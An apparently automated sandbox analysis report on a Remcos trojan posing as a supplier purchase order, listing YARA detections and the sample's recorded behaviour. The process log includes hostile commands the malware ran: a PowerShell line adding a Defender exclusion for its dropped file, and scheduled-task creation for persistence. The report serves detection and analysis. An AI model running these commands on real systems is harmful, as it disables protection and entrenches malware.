                      System Summary

                      Source: 12.2.keHuNxIumw.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 12.2.keHuNxIumw.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                      Source: 12.2.keHuNxIumw.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.4485430.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.4485430.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.4485430.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 12.2.keHuNxIumw.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 12.2.keHuNxIumw.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                      Source: 12.2.keHuNxIumw.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.4ec0e08.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.4ec0e08.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.4ec0e08.2.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.4ec0e08.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.4ec0e08.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.4485430.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.4485430.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
                      Source: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 00000000.00000002.2162828699.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000000.00000002.2162828699.0000000004379000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: Supplier Purchase Order - PO0002491.exe PID: 1868, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: keHuNxIumw.exe PID: 4464, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: initial sample | Static PE information: Filename: Supplier Purchase Order - PO0002491.exe
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress, | 12_2_004167EF
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Code function: 0_2_019FD4A4 | 0_2_019FD4A4
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Code function: 0_2_07BD74A0 | 0_2_07BD74A0
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Code function: 0_2_07BDA380 | 0_2_07BDA380
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Code function: 0_2_07BD749B | 0_2_07BD749B
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Code function: 0_2_07BDA370 | 0_2_07BDA370
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Code function: 0_2_07BD7170 | 0_2_07BD7170
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Code function: 0_2_07BD716B | 0_2_07BD716B
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Code function: 0_2_09457880 | 0_2_09457880
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Code function: 0_2_09459C50 | 0_2_09459C50
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Code function: 0_2_09451920 | 0_2_09451920
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Code function: 0_2_094539E0 | 0_2_094539E0
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Code function: 0_2_09452180 | 0_2_09452180
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Code function: 0_2_09452190 | 0_2_09452190
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Code function: 0_2_094542B8 | 0_2_094542B8
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Code function: 0_2_09451D58 | 0_2_09451D58
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 8_2_00EED4A4 | 8_2_00EED4A4
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 8_2_051149D0 | 8_2_051149D0
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 8_2_051149E0 | 8_2_051149E0
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 8_2_076B66D8 | 8_2_076B66D8
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 8_2_076B8A98 | 8_2_076B8A98
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 8_2_076B66C8 | 8_2_076B66C8
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 8_2_076B1D4B | 8_2_076B1D4B
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 8_2_076B1D58 | 8_2_076B1D58
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 8_2_076B42A7 | 8_2_076B42A7
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 8_2_076B42B8 | 8_2_076B42B8
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 8_2_076B1920 | 8_2_076B1920
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 8_2_076B1908 | 8_2_076B1908
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 8_2_076B39E0 | 8_2_076B39E0
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 8_2_076B39D0 | 8_2_076B39D0
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 8_2_076B2180 | 8_2_076B2180
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 8_2_076B2190 | 8_2_076B2190
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_0043706A | 12_2_0043706A
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_00414005 | 12_2_00414005
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_0043E11C | 12_2_0043E11C
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_004541D9 | 12_2_004541D9
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_004381E8 | 12_2_004381E8
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_0041F18B | 12_2_0041F18B
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_00446270 | 12_2_00446270
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_0043E34B | 12_2_0043E34B
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_004533AB | 12_2_004533AB
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_0042742E | 12_2_0042742E
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_00437566 | 12_2_00437566
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_0043E5A8 | 12_2_0043E5A8
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_004387F0 | 12_2_004387F0
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_0043797E | 12_2_0043797E
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_004339D7 | 12_2_004339D7
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_0044DA49 | 12_2_0044DA49
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_00427AD7 | 12_2_00427AD7
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_0041DBF3 | 12_2_0041DBF3
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_00427C40 | 12_2_00427C40
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_00437DB3 | 12_2_00437DB3
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_00435EEB | 12_2_00435EEB
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_0043DEED | 12_2_0043DEED
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_00426E9F | 12_2_00426E9F
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: String function: 00402093 appears 50 times
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: String function: 00401E65 appears 34 times
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: String function: 00434E70 appears 54 times
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: String function: 00434801 appears 41 times
                      Source: Supplier Purchase Order - PO0002491.exe, 00000000.00000002.2160378134.000000000152E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Supplier Purchase Order - PO0002491.exe
                      Source: Supplier Purchase Order - PO0002491.exe, 00000000.00000002.2175774406.0000000009850000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs Supplier Purchase Order - PO0002491.exe
                      Source: Supplier Purchase Order - PO0002491.exe, 00000000.00000000.2095981642.0000000000FB2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameldPH.exe& vs Supplier Purchase Order - PO0002491.exe
                      Source: Supplier Purchase Order - PO0002491.exe, 00000000.00000002.2162828699.0000000004379000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs Supplier Purchase Order - PO0002491.exe
                      Source: Supplier Purchase Order - PO0002491.exe | Binary or memory string: OriginalFilenameldPH.exe& vs Supplier Purchase Order - PO0002491.exe
                      Source: Supplier Purchase Order - PO0002491.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 12.2.keHuNxIumw.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 12.2.keHuNxIumw.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 12.2.keHuNxIumw.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.4485430.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.4485430.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.4485430.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 12.2.keHuNxIumw.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 12.2.keHuNxIumw.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 12.2.keHuNxIumw.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.4ec0e08.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.4ec0e08.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.4ec0e08.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.4ec0e08.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.4ec0e08.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.4485430.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.4485430.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 00000000.00000002.2162828699.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000000.00000002.2162828699.0000000004379000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: Supplier Purchase Order - PO0002491.exe PID: 1868, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: keHuNxIumw.exe PID: 4464, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Supplier Purchase Order - PO0002491.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: keHuNxIumw.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.9850000.4.raw.unpack, Wk3seexTX6tZtWvfvc.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.453f850.1.raw.unpack, mqshXHrVQ97YMT4tEt.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.453f850.1.raw.unpack, mqshXHrVQ97YMT4tEt.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.453f850.1.raw.unpack, mqshXHrVQ97YMT4tEt.cs | Security API names: _0020.AddAccessRule
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.9850000.4.raw.unpack, mqshXHrVQ97YMT4tEt.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.9850000.4.raw.unpack, mqshXHrVQ97YMT4tEt.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.9850000.4.raw.unpack, mqshXHrVQ97YMT4tEt.cs | Security API names: _0020.AddAccessRule
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.453f850.1.raw.unpack, Wk3seexTX6tZtWvfvc.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: classification engine | Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@16/12@1/2
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, | 12_2_0041798D
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle, | 12_2_0040F4AF
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource, | 12_2_0041B539
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, | 12_2_0041AADB
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | File created: C:\Users\user\AppData\Roaming\keHuNxIumw.exe
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Mutant created: NULL
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7056:120:WilError_03
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1196:120:WilError_03
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-GOFAGZ
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3552:120:WilError_03
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | File created: C:\Users\user\AppData\Local\Temp\tmp9421.tmp
                      Source: Supplier Purchase Order - PO0002491.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: Supplier Purchase Order - PO0002491.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | File read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: Supplier Purchase Order - PO0002491.exe | ReversingLabs: Detection: 73%
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | File read: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe
                      Source: unknown | Process created: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe "C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe"
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\keHuNxIumw.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\keHuNxIumw" /XML "C:\Users\user\AppData\Local\Temp\tmp9421.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Process created: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe "C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe"
                      Source: unknown | Process created: C:\Users\user\AppData\Roaming\keHuNxIumw.exe C:\Users\user\AppData\Roaming\keHuNxIumw.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\keHuNxIumw" /XML "C:\Users\user\AppData\Local\Temp\tmpB43C.tmp"
